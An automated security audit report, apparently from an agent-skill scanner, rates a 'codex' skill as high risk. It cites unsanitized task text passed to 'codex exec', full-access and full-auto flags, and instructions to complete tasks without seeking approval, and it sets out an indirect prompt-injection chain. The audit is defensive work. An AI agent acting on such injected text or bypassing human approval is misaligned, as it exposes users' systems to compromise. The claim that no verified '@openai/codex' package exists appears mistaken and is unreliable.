codex
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS] (HIGH): The skill instructs the user to install
@openai/codexvia npm. OpenAI's official library is 'openai'; there is no verified '@openai/codex' package, making this a high risk for supply chain attacks or typosquatting. - [REMOTE_CODE_EXECUTION] (HIGH): The core functionality revolves around
codex exec, which executes AI-generated code. The skill explicitly encourages 'Autonomous' operation ('Complete tasks without seeking approval for each step'), creating a massive RCE surface if the agent is given untrusted inputs. - [COMMAND_EXECUTION] (HIGH): The skill promotes use of the
-s danger-full-accessand--full-autoflags, which grant the CLI network access, system-level permissions, and file modification rights without human-in-the-loop verification. - [PROMPT_INJECTION] (MEDIUM): The 'Execution Principles' section contains behavioral overrides, instructing the agent to be 'Autonomous' and 'Complete tasks without seeking approval,' which bypasses standard safety guardrails for tool usage.
- [INDIRECT PROMPT INJECTION] (HIGH): Mandatory Evidence Chain:
- Ingestion points: Untrusted task descriptions are passed directly to
codex exec(e.g., 'implement user auth'). - Boundary markers: None. Data is interpolated directly into the execution command.
- Capability inventory: Full workspace write, network access, and system-level access (
danger-full-access). - Sanitization: None. The skill relies on the AI to generate 'minimal' code but provides no validation mechanisms.
Recommendations
- AI detected serious security threats
Audit Metadata